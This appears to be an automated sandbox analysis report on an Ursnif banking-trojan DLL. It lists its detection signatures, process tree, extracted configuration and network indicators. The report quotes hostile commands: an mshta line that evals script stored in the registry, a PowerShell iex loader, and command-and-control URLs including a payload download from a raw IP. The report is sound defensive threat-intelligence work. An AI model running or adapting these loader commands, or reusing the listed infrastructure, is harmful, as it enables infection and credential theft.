Loading ...

Play interactive tourEdit tour

Analysis Report 5fd9d7ec9e7aetar.dll

Overview

General Information

Sample Name:5fd9d7ec9e7aetar.dll
Analysis ID:331120
MD5:7d675f9a252b26cd655607ae8b36c3e9
SHA1:522894a5e30417192c053579d583ff7a690316a7
SHA256:5e7f200f26fb2fc09ca80862fc6bec38f7d539aada080af6461771f9233c054f
Tags:brtdllgoziisfbursnif

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5508 cmdline: loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • control.exe (PID: 5128 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 6276 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6324 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3880 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2588 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4380 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6308 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5092 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6620 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6180 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1396 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5044 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 15 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6620, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', ProcessId: 6180
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5092, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 6620
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6620, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', ProcessId: 6180

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: loaddll32.exe.5508.0.memstrMalware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: rosadalking.xyzVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: 5fd9d7ec9e7aetar.dllVirustotal: Detection: 12%Perma Link
            Source: 5fd9d7ec9e7aetar.dllReversingLabs: Detection: 10%
            Source: 0.2.loaddll32.exe.1500000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: C:\Windows\explorer.exeCode function: 37_2_03B7174C RegisterDeviceNotificationA,37_2_03B7174C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02F632BA
            Source: C:\Windows\explorer.exeCode function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,37_2_03B70180
            Source: C:\Windows\explorer.exeCode function: 37_2_03B60C34 FindFirstFileW,37_2_03B60C34
            Source: C:\Windows\explorer.exeCode function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW,37_2_03B5A85C

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Found Tor onion addressShow sources
            Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: Joe Sandbox ViewIP Address: 216.58.210.2 216.58.210.2
            Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
            Source: Joe Sandbox ViewJA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
            Source: unknownTCP traffic detected without corresponding DNS query: 89.44.9.160
            Source: unknownTCP traffic detected without corresponding DNS query: 89.44.9.160
            Source: unknownTCP traffic detected without corresponding DNS query: 89.44.9.160
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: global trafficHTTP traffic detected: GET /images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rosadalking.xyzConnection: Keep-AliveCookie: PHPSESSID=ioak1ilk7vhlu36vv01oie9fv7; lang=en
            Source: global trafficHTTP traffic detected: GET /images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDsy5Ztqa5MO/ZE1uNeIragrUuVu9/t1VvHxGOnUeE0N9/AofD3_2FkZDH3xF9WG/e6QRtMJki/mDfRsmXPGHOJcDq1VRhX/EAwOOQEOyOVMOCO4aMJ/IIjWmZnO6yO6LwKDQCAmcr/fLzp.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
            Source: global trafficHTTP traffic detected: GET /images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/A6Pn.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: rosadalking.xyz
            Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: http://89.44.9.160/gr32.rar
            Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: http://89.44.9.160/gr32.rarB
            Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: http://89.44.9.160/gr32.rarb
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
